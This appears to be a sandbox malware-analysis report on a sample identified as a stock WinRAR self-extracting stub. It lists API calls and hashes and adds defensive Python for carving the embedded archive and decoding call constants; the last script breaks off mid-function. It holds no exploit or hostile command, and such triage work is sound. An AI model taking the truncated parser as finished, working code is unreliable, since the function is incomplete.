    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: f84aead7d56dbe716f39b194cd65ba6f6979eb935b9f2721926e002167b66887
    • Instruction ID: 92d79fdad70c7bcd43712610ea906a6dee8a4da13df6976fe57ce77cf420503f
    • Opcode Fuzzy Hash: f84aead7d56dbe716f39b194cd65ba6f6979eb935b9f2721926e002167b66887
    • Instruction Fuzzy Hash: 9B51FF72600216ABDF258F65CC82FEF7BA9EB44750F254268FC24E6140EBB4DD44D690

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xC9AB40 to 0xC9AC99: CreateFileW, GetLastError, a second CreateFileW attempt, GetLastError, then SetFileTime.)
    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C98243,?,00000005,?,00000011), ref: 00C9ABBF
    • GetLastError.KERNEL32(?,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9ABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00C98243,?,00000005,?), ref: 00C9AC02
    • GetLastError.KERNEL32(?,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9AC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C98243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C9AC59
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: b6d875666ef2f874278cddcfda12748bcd68d4bbfa2e651c667b5b68e07bcd01
    • Instruction ID: 91f5f0aed87bdf6d9b16b4016f7c040e0c22a65466cf271225495943ab3ea992
    • Opcode Fuzzy Hash: b6d875666ef2f874278cddcfda12748bcd68d4bbfa2e651c667b5b68e07bcd01
    • Instruction Fuzzy Hash: CF314C305447856FEB309F24DC49BDABBD4BB05324F100B19F9B1961D1C7B2A945CBD6

    Control-flow Graph (rendered in the original report; not reproduced here)

    APIs
      • Part of subcall function 00CA24DF: ResetEvent.KERNEL32(?), ref: 00CA24F1
      • Part of subcall function 00CA24DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CA2505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CA223A
    • CloseHandle.KERNEL32(?,?), ref: 00CA2254
    • DeleteCriticalSection.KERNEL32(?), ref: 00CA226D
    • CloseHandle.KERNEL32(?), ref: 00CA2279
    • CloseHandle.KERNEL32(?), ref: 00CA2285
      • Part of subcall function 00CA22FC: WaitForSingleObject.KERNEL32(?,000000FF,00CA2516,?), ref: 00CA2302
      • Part of subcall function 00CA22FC: GetLastError.KERNEL32(?), ref: 00CA230E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 3ec4c94e7ee0524317ba8226bbdbb004c36df162dec0012252a090dbbc8c6348
    • Instruction ID: c60eff90d9d66271d360050823bc8d9e92c74296d85f37bb176e511b707678d6
    • Opcode Fuzzy Hash: 3ec4c94e7ee0524317ba8226bbdbb004c36df162dec0012252a090dbbc8c6348
    • Instruction Fuzzy Hash: 53018472440745EFC7269F68DD85FCABBAAFB08710F004929F26B92160CB757A54DB90

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xCAC748 to 0xCAC79E: PeekMessageW, KiUserCallbackDispatcher, IsDialogMessageW, TranslateMessage, DispatchMessageW.)
    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
    • IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
    • TranslateMessage.USER32(?), ref: 00CAC78C
    • DispatchMessageW.USER32(?), ref: 00CAC796
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: 2be5538ce50912cc75f4aa2218f9608e906c04dccd4ce1dd3d3e657dfba73df8
    • Instruction ID: b6aa16f9b2a7379af1bc2b92b1aca6e196e38c2e2721811737b9ed65f612ae35
    • Opcode Fuzzy Hash: 2be5538ce50912cc75f4aa2218f9608e906c04dccd4ce1dd3d3e657dfba73df8
    • Instruction Fuzzy Hash: 4AF06D71A0161AAB8B20ABE59C4CFEF7FACEE057957404415B716D2050EB64D505CBF1

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xCABBB0 to 0xCABC06: GetClassNameW, FindWindowExW, SHAutoComplete.)
    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 00CABBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CABBFE
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CABBEE
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: EDIT
    • API String ID: 4243998846-3080729518
    • Opcode ID: f08e80fb5e567e239f66ed0067fdd7f5a0db7fc791dbf985f711a063b93463b7
    • Instruction ID: 468459babd913af71d8f48565ac832ea472bdaa0a2eb468c80d0b5bb223fb873
    • Opcode Fuzzy Hash: f08e80fb5e567e239f66ed0067fdd7f5a0db7fc791dbf985f711a063b93463b7
    • Instruction Fuzzy Hash: 5AF0A7326017297BDB3056269C09FAF766CAF47B54F440065FB00F6185DB64EE01C6F6

    Control-flow Graph (rendered in the original report; not reproduced here)

    APIs
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • OleInitialize.OLE32(00000000), ref: 00CABD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CABD5B
    • SHGetMalloc.SHELL32(00CDA460), ref: 00CABD65
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll
    • API String ID: 3498096277-3360196438
    • Opcode ID: 73f7c5cc6b51ed9a12271b6a5a1c81ea05c01fccc1b8c5e391aa16a2527cb187
    • Instruction ID: 5bd1331e46dcdd58b3ab8c8c613543af6534f131bb37e3377673eaaa303ea8a2
    • Opcode Fuzzy Hash: 73f7c5cc6b51ed9a12271b6a5a1c81ea05c01fccc1b8c5e391aa16a2527cb187
    • Instruction Fuzzy Hash: 86F01DB5D00209ABCB10AF99D849EEFFFFCEF85705F00406AEA11E2250DBB45645CBA1

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xCAED1E to 0xCAED78: two SetEnvironmentVariableW calls.)
    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00CAED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CAED70
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: ea116d087645666329c81b9719386bc16d12fc6e65ec3880a1a852705ba466ca
    • Instruction ID: 43f281ad78fce923363cc888eb59fbf1be32f4f6af69bbbd2f15a3cafa31dc23
    • Opcode Fuzzy Hash: ea116d087645666329c81b9719386bc16d12fc6e65ec3880a1a852705ba466ca
    • Instruction Fuzzy Hash: C6F03072804236AADB212BD1CC05FEE7B98EF17B8AB084065FD85A6052E660C980D6F0
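The two SetEnvironmentVariableW calls in this function (sfxcmd, sfxpar) are the behaviour of the stock WinRAR SFX module, which sets those two variables (its own command line and the parameters it received) before running the Setup commands stored in the archive. That identifies this code as the unmodified SFX stub rather than anything the sample's author wrote, so the triage step that follows is to carve the archive appended to the stub and list it. The Python below is an added example, not code from this report or from WinRAR: it scans a buffer for the RAR4 and RAR5 signatures, validates that a main archive header follows each hit (the stub itself can carry the signature bytes as a string constant, so the first hit is not trusted blindly), and reports the stub size and archive format. The sample buffer is constructed inline and is not a real binary.

```python
RAR4_SIG = b"Rar!\x1a\x07\x00"       # RAR 1.5 - 4.x marker block
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"   # RAR 5.0 signature


def _read_vint(buf: bytes, pos: int):
    """RAR5 variable-length integer: 7 payload bits per byte, high bit = continue."""
    value, shift = 0, 0
    while pos < len(buf) and shift < 70:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos
    return None, pos          # ran off the buffer or the encoding never terminated


def _rar4_main_header_follows(buf: bytes, off: int) -> bool:
    # After the 7-byte marker block the main archive header must follow:
    # HEAD_CRC (2) HEAD_TYPE (1) == 0x73 HEAD_FLAGS (2) HEAD_SIZE (2).
    p = off + len(RAR4_SIG)
    return len(buf) >= p + 7 and buf[p + 2] == 0x73


def _rar5_main_header_follows(buf: bytes, off: int) -> bool:
    # After the 8-byte signature: CRC32 (4), header size (vint), header type (vint) == 1.
    p = off + len(RAR5_SIG) + 4
    size, p = _read_vint(buf, p)
    htype, _ = _read_vint(buf, p)
    return size is not None and htype == 1


def find_embedded_archives(data: bytes) -> list:
    """Every signature hit whose following bytes parse as a main archive header.

    The stub code may itself contain the signature as a string constant, so a bare
    search for the first hit is not enough; each hit is validated.
    """
    hits = []
    for sig, version, check in ((RAR5_SIG, 5, _rar5_main_header_follows),
                                (RAR4_SIG, 4, _rar4_main_header_follows)):
        start = 0
        while (off := data.find(sig, start)) != -1:
            if check(data, off):
                hits.append({"offset": off, "version": version})
            start = off + 1
    return sorted(hits, key=lambda h: h["offset"])


def analyze_sfx(data: bytes) -> dict:
    """Summarise a candidate SFX module: PE stub present, stub size, archive format."""
    hits = find_embedded_archives(data)
    return {
        "is_pe": data[:2] == b"MZ",
        "stub_size": hits[0]["offset"] if hits else None,
        "archive_version": hits[0]["version"] if hits else None,
        "candidates": hits,
    }


def carve(data: bytes) -> bytes:
    """Return the bytes from the archive start to EOF (hand these to unrar or 7-Zip)."""
    hits = find_embedded_archives(data)
    return data[hits[0]["offset"]:] if hits else b""


def build_sample() -> bytes:
    """Constructed stand-in for an SFX module (not a real binary): a token MZ/PE
    header and padding, the RAR5 signature embedded as a constant followed by
    non-header bytes, then an appended RAR5 archive whose main header is valid."""
    stub = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200
    stub += RAR5_SIG + b"\xff" * 8          # the signature constant inside the stub
    stub += b"\x90" * 100
    # main archive header: CRC32 placeholder, size=3, type=1 (main), flags=0, archive flags=0
    main_header = b"\x00\x00\x00\x00" + b"\x03\x01\x00\x00"
    return stub + RAR5_SIG + main_header + b"<file headers and data omitted>"


if __name__ == "__main__":
    print(analyze_sfx(build_sample()))
```

The carved bytes are a normal RAR archive; listing it with unrar or 7-Zip shows the files the SFX drops and the archive comment that holds the SFX script (the Setup, Path and Silent directives), which is where the sample's actual intent lives rather than in the stub code catalogued on this page.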

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xCB4D92 to 0xCB4DDC: LoadLibraryExW, GetLastError, then a fallback LoadLibraryExW.)
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB4D43,00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx), ref: 00CB4D9F
    • GetLastError.KERNEL32(?,00CB4D43,00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx,00000000,?,00CB4C9D), ref: 00CB4DA9
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB4DD1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 73fa7072b0bfc0354f43e93aea094b7b3dddbba41ea9401903aa3af5d79dc28d
    • Instruction ID: 7b5cf94825bef1123c1880faa568efc6c8ec72bd3b91d62081a0207037d47d3c
    • Opcode Fuzzy Hash: 73fa7072b0bfc0354f43e93aea094b7b3dddbba41ea9401903aa3af5d79dc28d
    • Instruction Fuzzy Hash: 3BE04F34688208B7EF141F71EC06F9D3FA8EB10B52F144120FD1DA84F1DB629A619984

    Control-flow Graph (rendered in the original report with an Executed / Not Executed legend; not reproduced here. Basic blocks 0xC9A9E5 to 0xC9AA77: GetStdHandle, ReadFile, GetLastError (twice), with a recursive call back to 0xC9A9E5.)
    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 00C9A9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C9AA0D
    • GetLastError.KERNEL32 ref: 00C9AA3F
    • GetLastError.KERNEL32 ref: 00C9AA5E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: f451cacd301060726cb90740ec441f0eb6331c90b77cac31ee7ba858d677e16a
    • Instruction ID: 8885c0db7dd6f7305f718fe407c96f8215be0ec99b093f9e794e992fc1a521be
    • Opcode Fuzzy Hash: f451cacd301060726cb90740ec441f0eb6331c90b77cac31ee7ba858d677e16a
    • Instruction Fuzzy Hash: 92117C31940204EBCF209F61DA08B6E37A9FB05765F10862AF926851A0DF758F44EFD3
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C9EA30,00000000,00000000,?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue), ref: 00CBBF16
    • GetLastError.KERNEL32(?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue,00CC8A00,FlsSetValue,00000000,00000364,?,00CBA5D7), ref: 00CBBF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CBBE8B,00C9EA30,00000000,00000000,00000000,?,00CBC088,00000006,FlsSetValue,00CC8A00,FlsSetValue,00000000), ref: 00CBBF30
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: a92ccfe73f6b2dc1917db76fe79786ad3b08b1a43bec7acd3b1c5be24d1b16c1
    • Instruction ID: 92508c5d4d08173bbe2484d6717c95a3f2362da4f498be997f88fdf2bb9fd9fd
    • Opcode Fuzzy Hash: a92ccfe73f6b2dc1917db76fe79786ad3b08b1a43bec7acd3b1c5be24d1b16c1
    • Instruction Fuzzy Hash: C601F73A3552229BC7258BA9EC54FBB7798EF057A2B114620F92AD3140CBA0DD01CAE0
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00C9E79B,00000001,?,?,?,00000000,00CA66B2,?,?,?), ref: 00C9B22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CA66B2,?,?,?,?,?,00CA6174,?), ref: 00C9B275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00C9E79B,00000001,?,?), ref: 00C9B2A1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: 8a509e20e9d2f515208ecc22832d7370bf669d7dacba5f76e2d2ce81c4531cdc
    • Instruction ID: 3a77ea6d7f77a48347bbe8e575c500c3e9b494d6d6e8959851a90a43c0a6475a
    • Opcode Fuzzy Hash: 8a509e20e9d2f515208ecc22832d7370bf669d7dacba5f76e2d2ce81c4531cdc
    • Instruction Fuzzy Hash: 2831AB71248306AFDF08CF10EA18BAE77A5FB81715F00461DF99167690CB74AE48CBA2
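The call listings on this page print every immediate as bare hex, so reading them means knowing that 00000003 and 08000000 in CreateFileW are OPEN_EXISTING and FILE_FLAG_SEQUENTIAL_SCAN (an archive extractor opening its input for a straight read), that 00000800 in LoadLibraryExW is LOAD_LIBRARY_SEARCH_SYSTEM32 (the CRT's hardened loader path, not a hijack-prone search), that 000000F6 in GetStdHandle is STD_INPUT_HANDLE, and that 00000444 in SendMessageW is EM_SETCHARFORMAT on the rich-edit license box. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses lines in this report's call-list format (including the "Part of subcall function" lines and calls printed without a parameter list) and names the constants for the APIs whose flag arguments matter in triage. The sample lines are copied from this page; treating the GetStdHandle value as a sign-extended imm8 is an assumption about how the plugin prints "push -10".

```python
import re
from typing import Optional

# Line format used by the Joe Sandbox IDA plugin in this report, e.g.
#   "• CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000), ref: 00C9ABBF"
#   "  • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CBA820"
#   "• GetLastError.KERNEL32 ref: 00C9AA3F"
_CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Documented Win32 constants; only those needed for the immediates seen in this report.
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
LOADLIB_FLAGS = {0x0001: "DONT_RESOLVE_DLL_REFERENCES", 0x0002: "LOAD_LIBRARY_AS_DATAFILE",
                 0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32"}
STD_HANDLES = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}
EDIT_MESSAGES = {0x00B1: "EM_SETSEL", 0x00C2: "EM_REPLACESEL",
                 0x043A: "EM_GETCHARFORMAT", 0x0444: "EM_SETCHARFORMAT"}


def parse_call(line: str) -> Optional[dict]:
    """Parse one call line; hex immediates become ints, '?' becomes None, strings stay."""
    m = _CALL_RE.search(line)
    if not m:
        return None
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        if tok == "?":
            args.append(None)
        elif re.fullmatch(r"-?[0-9A-F]{8}", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)          # literal argument such as sfxcmd or EDIT
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}


def parse_report(text: str) -> list:
    return [c for c in (parse_call(ln) for ln in text.splitlines()) if c]


def _flag_names(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
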